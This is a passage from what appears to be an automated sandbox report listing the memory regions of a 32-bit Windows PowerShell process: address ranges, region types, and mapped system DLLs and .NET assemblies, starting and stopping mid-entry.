"\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1969 start_va = 0x752b0000 end_va = 0x7530bfff entry_point = 0x752b0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1970 start_va = 0x75310000 end_va = 0x7534efff entry_point = 0x75310000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1979 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1980 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1981 start_va = 0x70000 end_va = 0xd6fff entry_point = 0x70000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1982 start_va = 0x300000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 1983 start_va = 0x470000 end_va = 0x56ffff entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 1984 start_va = 0x75440000 end_va = 0x75489fff entry_point = 0x75440000 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll") Region: id = 1985 start_va = 0x75490000 end_va = 0x754a3fff entry_point = 0x75490000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\SysWOW64\\atl.dll" (normalized: "c:\\windows\\syswow64\\atl.dll") Region: id = 1986 start_va = 0x75970000 end_va = 0x7597bfff entry_point = 0x75970000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1987 start_va = 0x75980000 end_va = 0x759dffff entry_point = 0x75980000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1988 start_va = 0x759e0000 end_va = 0x759f8fff entry_point = 0x759e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1989 start_va = 0x75a10000 end_va = 0x75abbfff entry_point = 0x75a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1990 start_va = 0x75c60000 end_va = 0x75cb6fff entry_point = 0x75c60000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1991 start_va = 0x75cf0000 end_va = 0x75e4bfff entry_point = 0x75cf0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1992 start_va = 0x75f40000 end_va = 0x75f85fff entry_point = 0x75f40000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1993 start_va = 0x75fa0000 end_va = 0x7603cfff entry_point = 0x75fa0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1994 start_va = 0x760d0000 end_va = 0x761bffff entry_point = 0x760d0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1995 start_va = 0x76220000 end_va = 0x7632ffff entry_point = 0x76220000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1996 start_va = 0x76490000 end_va = 0x7652ffff entry_point = 0x76490000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1997 start_va = 0x76720000 end_va = 0x767aefff entry_point = 0x76720000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1998 start_va = 0x76a70000 end_va = 0x76afffff entry_point = 0x76a70000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1999 start_va = 0x77810000 end_va = 0x77819fff entry_point = 0x77810000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 2000 start_va = 0x77820000 end_va = 0x7791ffff entry_point = 0x77820000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2001 start_va = 0x77a20000 end_va = 0x77b19fff entry_point = 0x0 region_type = private name = "private_0x0000000077a20000" filename = "" Region: id = 2002 start_va = 0x77b20000 end_va = 0x77c3efff entry_point = 0x0 region_type = private name = "private_0x0000000077b20000" filename = "" Region: id = 2003 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2004 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2005 start_va = 0x570000 end_va = 0x6f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 2006 start_va = 0x75c00000 end_va = 0x75c5ffff entry_point = 0x75c00000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2007 start_va = 0x75e50000 end_va = 0x75f1bfff entry_point = 0x75e50000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2008 start_va = 0x30000 end_va = 0x36fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2009 start_va = 0xe0000 end_va = 0xe1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 2010 start_va = 0x130000 end_va = 0x132fff entry_point = 0x130000 region_type = mapped_file name = "powershell.exe.mui" filename = "\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\powershell.exe.mui" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\en-us\\powershell.exe.mui") Region: id = 2011 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 2012 start_va = 0x150000 end_va = 0x150fff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 2013 start_va = 0x700000 end_va = 0x880fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 2014 start_va = 0x890000 end_va = 0x1c8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000890000" filename = "" Region: id = 2015 start_va = 0x1da0000 end_va = 0x1daffff entry_point = 0x0 region_type = private name = "private_0x0000000001da0000" filename = "" Region: id = 2016 start_va = 0x1eb0000 end_va = 0x1eeffff entry_point = 0x0 region_type = private name = "private_0x0000000001eb0000" filename = "" Region: id = 2017 start_va = 0x2060000 end_va = 0x209ffff entry_point = 0x0 region_type = private name = "private_0x0000000002060000" filename = "" Region: id = 2018 start_va = 0x75210000 end_va = 0x7528ffff entry_point = 0x75210000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2019 start_va = 0x160000 end_va = 0x160fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 2020 start_va = 0x390000 end_va = 0x46efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000390000" filename = "" Region: id = 2021 start_va = 0x76040000 end_va = 0x760c2fff entry_point = 0x76040000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 2022 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 2023 start_va = 0x76b00000 end_va = 0x77749fff entry_point = 0x76b00000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 2026 start_va = 0x754c0000 end_va = 0x754d6fff entry_point = 0x754c0000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 2027 start_va = 0x75950000 end_va = 0x7595afff entry_point = 0x75950000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 2028 start_va = 0x180000 end_va = 0x181fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 2029 start_va = 0x74ed0000 end_va = 0x7506dfff entry_point = 0x74ed0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 2030 start_va = 0x190000 end_va = 0x190fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 2031 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2032 start_va = 0x240000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 2033 start_va = 0x1d30000 end_va = 0x1d6ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d30000" filename = "" Region: id = 2034 start_va = 0x20a0000 end_va = 0x236efff entry_point = 0x20a0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2035 start_va = 0x74dd0000 end_va = 0x74ec4fff entry_point = 0x74dd0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 2036 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 2037 start_va = 0x75f20000 end_va = 0x75f31fff entry_point = 0x75f20000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 2038 start_va = 0x76580000 end_va = 0x7671cfff entry_point = 0x76580000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 2039 start_va = 0x77750000 end_va = 0x77776fff entry_point = 0x77750000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 2040 start_va = 0x2370000 end_va = 0x2762fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 2041 start_va = 0x75410000 end_va = 0x75430fff entry_point = 0x75410000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 2042 start_va = 0x76530000 end_va = 0x76574fff entry_point = 0x76530000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 2043 start_va = 0x1c0000 end_va = 0x1dffff entry_point = 0x1c0000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000017.db" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db") Region: id = 2044 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2045 start_va = 0x1ce0000 end_va = 0x1d1ffff entry_point = 0x0 region_type = private name = "private_0x0000000001ce0000" filename = "" Region: id = 2046 start_va = 0x1db0000 end_va = 0x1eaffff entry_point = 0x0 region_type = private name = "private_0x0000000001db0000" filename = "" Region: id = 2047 start_va = 0x27a0000 end_va = 0x27dffff entry_point = 0x0 region_type = private name = "private_0x00000000027a0000" filename = "" Region: id = 2048 start_va = 0x753c0000 end_va = 0x7540bfff entry_point = 0x753c0000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 2049 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 2055 start_va = 0x75390000 end_va = 0x753bdfff entry_point = 0x75390000 region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\SysWOW64\\shdocvw.dll" (normalized: "c:\\windows\\syswow64\\shdocvw.dll") Region: id = 2056 start_va = 0x75370000 end_va = 0x75378fff entry_point = 0x75370000 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\SysWOW64\\linkinfo.dll" (normalized: "c:\\windows\\syswow64\\linkinfo.dll") Region: id = 2107 start_va = 0x1b0000 end_va = 0x1b3fff entry_point = 0x1b0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 2108 start_va = 0x230000 end_va = 0x233fff entry_point = 0x230000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 2109 start_va = 0x280000 end_va = 0x2affff entry_point = 0x280000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000001c.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db") Region: id = 2110 start_va = 0x1ef0000 end_va = 0x1f55fff entry_point = 0x1ef0000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 2111 start_va = 0x74d60000 end_va = 0x74dcffff entry_point = 0x74d60000 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\SysWOW64\\ntshrui.dll" (normalized: "c:\\windows\\syswow64\\ntshrui.dll") Region: id = 2112 start_va = 0x75350000 end_va = 0x75368fff entry_point = 0x75350000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 2113 start_va = 0x1fa0000 end_va = 0x1fdffff entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 2114 start_va = 0x28e0000 end_va = 0x291ffff entry_point = 0x0 region_type = private name = "private_0x00000000028e0000" filename = "" Region: id = 2115 start_va = 0x74d50000 end_va = 0x74d5afff entry_point = 0x74d50000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\SysWOW64\\cscapi.dll" (normalized: "c:\\windows\\syswow64\\cscapi.dll") Region: id = 2116 start_va = 0x7efad000 end_va = 0x7efaffff entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 2117 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\SysWOW64\\slc.dll" (normalized: "c:\\windows\\syswow64\\slc.dll") Region: id = 2118 start_va = 0x754e0000 end_va = 0x7551afff entry_point = 0x754e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2119 start_va = 0x75520000 end_va = 0x75535fff entry_point = 0x75520000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 2120 start_va = 0x74cc0000 end_va = 0x74d37fff entry_point = 0x74cc0000 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll") Region: id = 2121 start_va = 0x753b0000 end_va = 0x753b8fff entry_point = 0x753b0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 2175 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 2176 start_va = 0x2af0000 end_va = 0x2b2ffff entry_point = 0x0 region_type = private name = "private_0x0000000002af0000" filename = "" Region: id = 2177 start_va = 0x74670000 end_va = 0x7470afff entry_point = 0x74670000 region_type = mapped_file name = "msvcr80.dll" filename = "\\Windows\\winsxs\\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\\msvcr80.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\\msvcr80.dll") Region: id = 2178 start_va = 0x74710000 end_va = 0x74cbafff entry_point = 0x74710000 region_type = mapped_file name = "mscorwks.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorwks.dll") Region: id = 2374 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002c0000" filename = "" Region: id = 2375 start_va = 0x2d0000 end_va = 0x2d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 2376 start_va = 0x2e0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 2377 start_va = 0x2f0000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 2378 start_va = 0x1c90000 end_va = 0x1c9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c90000" filename = "" Region: id = 2379 start_va = 0x1ca0000 end_va = 0x1caffff entry_point = 0x0 region_type = private name = "private_0x0000000001ca0000" filename = "" Region: id = 2380 start_va = 0x1cb0000 end_va = 0x1cbffff entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 2381 start_va = 0x1cc0000 end_va = 0x1ccffff entry_point = 0x0 region_type = private name = "private_0x0000000001cc0000" filename = "" Region: id = 2382 start_va = 0x2820000 end_va = 0x285ffff entry_point = 0x0 region_type = private name = "private_0x0000000002820000" filename = "" Region: id = 2383 start_va = 0x28b0000 end_va = 0x28bffff entry_point = 0x0 region_type = private name = "private_0x00000000028b0000" filename = "" Region: id = 2384 start_va = 0x2950000 end_va = 0x298ffff entry_point = 0x0 region_type = private name = "private_0x0000000002950000" filename = "" Region: id = 2385 start_va = 0x29b0000 end_va = 0x29effff entry_point = 0x0 region_type = private name = "private_0x00000000029b0000" filename = "" Region: id = 2386 start_va = 0x29f0000 end_va = 0x2a8ffff entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 2387 start_va = 0x2b30000 end_va = 0x4b2ffff entry_point = 0x0 region_type = private name = "private_0x0000000002b30000" filename = "" Region: id = 2388 start_va = 0x4b30000 end_va = 0x4b6ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b30000" filename = "" Region: id = 2389 start_va = 0x732f0000 end_va = 0x73de7fff entry_point = 0x732f0000 region_type = mapped_file name = "mscorlib.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\mscorlib\\62a0b3e4b40ec0e8c5cfaa0c8848e64a\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\mscorlib\\62a0b3e4b40ec0e8c5cfaa0c8848e64a\\mscorlib.ni.dll") Region: id = 2390 start_va = 0x7efa7000 end_va = 0x7efa9fff entry_point = 0x0 region_type = private name = "private_0x000000007efa7000" filename = "" Region: id = 2391 start_va = 0x7efaa000 end_va = 0x7efacfff entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 2445 start_va = 0x1cd0000 end_va = 0x1cdffff entry_point = 0x0 region_type = private name = "private_0x0000000001cd0000" filename = "" Region: id = 2446 start_va = 0x4b70000 end_va = 0x4e51fff entry_point = 0x4b70000 region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 2447 start_va = 0x72b50000 end_va = 0x732ebfff entry_point = 0x72b50000 region_type = mapped_file name = "system.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System\\9e0a3b9b9f457233a335d7fba8f95419\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system\\9e0a3b9b9f457233a335d7fba8f95419\\system.ni.dll") Region: id = 2448 start_va = 0x75120000 end_va = 0x751a0fff entry_point = 0x75120000 region_type = mapped_file name = "microsoft.powershell.consolehost.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\b1c511d8fad78ad3c5213b2b4fb02b8b\\Microsoft.PowerShell.ConsoleHost.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\b1c511d8fad78ad3c5213b2b4fb02b8b\\microsoft.powershell.consolehost.ni.dll") Region: id = 2449 start_va = 0x71fe0000 end_va = 0x72859fff entry_point = 0x71fe0000 region_type = mapped_file name = "system.management.automation.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Management.A#\\4436815b432c313255af322f4ec3560d\\System.Management.Automation.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.management.a#\\4436815b432c313255af322f4ec3560d\\system.management.automation.ni.dll") Region: id = 2450 start_va = 0x72860000 end_va = 0x72b41fff entry_point = 0x72860000 region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 2451 start_va = 0x72860000 end_va = 0x72b41fff entry_point = 0x72860000 region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 2452 start_va = 0x1d20000 end_va = 0x1d22fff entry_point = 0x1d20000 region_type = mapped_file name = "l_intl.nls" filename = "\\Windows\\SysWOW64\\l_intl.nls" (normalized: "c:\\windows\\syswow64\\l_intl.nls") Region: id = 2453 start_va = 0x4e60000 end_va = 0x4f1ffff entry_point = 0x4e60000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 2454 start_va = 0x75f90000 end_va = 0x75f94fff entry_point = 0x75f90000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 2455 start_va = 0x1d70000 end_va = 0x1d70fff entry_point = 0x0 region_type = private name = "private_0x0000000001d70000" filename = "" Region: id = 2456 start_va = 0x1d80000 end_va = 0x1d84fff entry_point = 0x1d80000 region_type = mapped_file name = "sorttbls.nlp" filename = "\\Windows\\assembly\\GAC_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp" (normalized: "c:\\windows\\assembly\\gac_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp") Region: id = 2457 start_va = 0x1fe0000 end_va = 0x2020fff entry_point = 0x1fe0000 region_type = mapped_file name = "sortkey.nlp" filename = "\\Windows\\assembly\\GAC_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp" (normalized: "c:\\windows\\assembly\\gac_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp") Region: id = 2458 start_va = 0x72860000 end_va = 0x72b41fff entry_point = 0x72860000 region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 2459 start_va = 0x72860000 end_va = 0x72b41fff entry_point = 0x72860000 region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 3552 start_va = 0x1d90000 end_va = 0x1d97fff entry_point = 0x1d90000 region_type = mapped_file name = "microsoft.wsman.runtime.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Runtime\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Runtime.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\microsoft.wsman.runtime\\1.0.0.0__31bf3856ad364e35\\microsoft.wsman.runtime.dll") Region: id = 3553 start_va = 0x1f60000 end_va = 0x1f60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f60000" filename = "" Region: id = 3554 start_va = 0x2860000 end_va = 0x28a2fff entry_point = 0x2860000 region_type = mapped_file name = "system.transactions.dll" filename = "\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\assembly\\gac_32\\system.transactions\\2.0.0.0__b77a5c561934e089\\system.transactions.dll") Region: id = 3555 start_va = 0x67aa0000 end_va = 0x67ae2fff entry_point = 0x67aa0000 region_type = mapped_file name = "system.transactions.dll" filename = "\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\assembly\\gac_32\\system.transactions\\2.0.0.0__b77a5c561934e089\\system.transactions.dll") Region: id = 3556 start_va = 0x71c70000 end_va = 0x71d0bfff entry_point = 0x71c70000 region_type = mapped_file name = "system.transactions.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Transactions\\ad18f93fc713db2c4b29b25116c13bd8\\System.Transactions.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.transactions\\ad18f93fc713db2c4b29b25116c13bd8\\system.transactions.ni.dll") Region: id = 3557 start_va = 0x71d10000 end_va = 0x71d94fff entry_point = 0x71d10000 region_type = mapped_file name = "microsoft.wsman.management.ni.dll" filename = 